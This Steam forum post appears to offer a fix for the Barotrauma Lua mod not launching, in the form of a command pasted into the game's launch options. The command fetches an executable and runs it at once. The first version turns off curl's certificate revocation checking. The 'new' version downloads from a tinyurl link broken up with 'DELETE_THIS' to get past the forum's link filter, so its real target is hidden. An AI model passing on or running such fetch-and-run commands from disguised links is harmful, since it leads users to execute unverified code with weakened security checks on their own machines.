Barotrauma

Barotrauma

Lua For Barotrauma
[SOLUTION] [UPDATED] GAME WON'T START WITH LUA
The problem may occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

NEW COMMAND
I reinstalled my Windows to replicate the issue and fix it
cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"

I hope this will help.:steamhappy:
Last edited by VanishGuy; 6 May @ 1:59am